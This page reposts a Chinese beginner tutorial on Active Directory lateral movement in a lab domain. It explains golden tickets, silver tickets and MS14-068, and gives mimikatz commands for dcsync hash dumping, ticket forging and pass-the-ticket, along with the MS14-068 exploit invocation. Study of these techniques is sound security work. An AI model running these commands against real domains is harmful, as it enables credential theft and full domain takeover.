当前位置:首页 > 每日看点 > 正文内容

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?

卡卷网8个月前 (04-04)每日看点118

kerberos协议访问请求图

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第1张

黄金票据

原理

黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

黄金票据的条件要求

1.域名称 test.com

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第2张

2.域的SID 值 S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第3张

3.域的KRBTGT账户NTLM密码哈希或者aes-256值

lsadump::dcsync /domain:test.com /user:krbtgt

4fbcddb2c382d2ff788e6b88bc6685f4

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第4张

4.伪造用户名 administrator

获得以上信息后就可以伪造票据了

删除现有的票据

klist purge

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第5张

klist 查看当前票据

没有票据时无法访问 dc

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第6张

伪造票据信息

kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /krbtgt:4fbcddb2c382d2ff788e6b88bc6685f4 /ptt

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第7张

之后可以访问

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第8张

白银票据

原理

白银票据是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等

白银票据的条件要求

1.域全名 WIN-OM48SNJFGAL.test.com

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第9张

2.域sid S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第10张

3.目标服务器FQDN WIN-OM48SNJFGAL.test.com

4.可利用的服务cifs

5.服务账号的NTML HASH 3a54b6e5168227fc55575efb4c2f21aa(一定要是带$的共享账号)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第11张

6.需要伪造的用户名test

伪造票据信息

kerberos::golden /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /target:WIN-OM48SNJFGAL.test.com /service:cifs /rc4:3a54b6e5168227fc55575efb4c2f21aa /user:aaa /ptt

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第12张


ms14-068

原理

ms14068的漏洞原理是伪造域管的tgt

ms14-068利用条件

ms14-068是不需要hash的值,只需要普通域用户的账号和密码即可.还有对应的用户sid值,但是有一个前提就是补丁没有打才可以使用

域用户账号和密码

对应用户*sid*值

域全名

MS14-068.exe -u aaa@test.com -p admin@123 -s S-1-5-21-3911998785-1923830468-1006530692 -d WIN-OM48SNJFGAL.test.com

导入生成的票据

kerberos::ptc TGT_aaa@test.com.ccache


初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第13张

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/04/12255.html

分享给朋友:

相关文章

网页上的视频怎么下载呀?

网页上的视频怎么下载呀?

1、贝贝BiliBili - B站视频下载https://xbeibeix.com/api/bilibili/贝贝BiliBili 是个免费、免登录的bilibili视频下载工具,没有任何套路。把视频链接粘贴进去 → 输入验证码 → 解析视...

在 Istio、Linkerd 和 Cilium 之间,哪种服务网格在性能上表现最佳?

在 Istio、Linkerd 和 Cilium 之间,哪种服务网格在性能上表现最佳?

在讨论服务网格之前,先理解一下为什么我们需要它。现代微服务架构意味着将应用拆分为多个小型、独立的服务,这些服务可以独立开发、部署和扩展。然而,服务之间的通信和管理成了巨大的挑战,例如如何保证安全的通信、负载均衡、监控与可观测性等。服务网格...

你每天用来涨知识的手机应用程序有哪些?

你每天用来涨知识的手机应用程序有哪些?

经过深度使用和测评,从100个APP中选出的这35个超实用的app,每一个都是最硬核最有料的涨知识神器!每天打开看看,能让你提神醒脑,眼界大开,成为朋友聚会上的话题王者!双击屏幕取走哦~先放上全部APP目录,有新闻资讯类、英语学习类、读书类...

为什么说不懂电脑的不要碰AMD?

作为一个资深垃圾佬,说缺点前,先说优点吧AMD CPU(后续简称AU)的优点:处理器对比Intel,三级缓存更大,最明显的感知就是,网游帧数更高(5900X,7900X之类高端型号都是双CCX共享大缓存,反而不如次一点的CPU帧数更高);相...

无意中发现技术主管写的代码,大家帮忙看看什么水平?

无意中发现技术主管写的代码,大家帮忙看看什么水平?

虽然很多答主用了诸如“典范级”、“心旷神怡” 的形容, 赞美这段代码, 但这里, 出于技术讨论的动机, 我说说不同看法.栈, 如果善于利用栈来处理树结构, 那么可以写出更简洁的代码, 根本不需要 recuresiveFn 这种方法. 泛型,...

如何看待 Luv Letter 表示影视飓风专业性实在是让人失望?

一点儿新进展,另外以下有部分需要关注对于统一变量的问题。这个我在对比上面有写小字解释,我在一开始使用ffmpeg来控制变量。但是发现了不少问题,比如因为遗留bug,会强制将非整数帧的素材转码为VFR导致无法正确帧间对比,因此不考虑,同时尽量...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。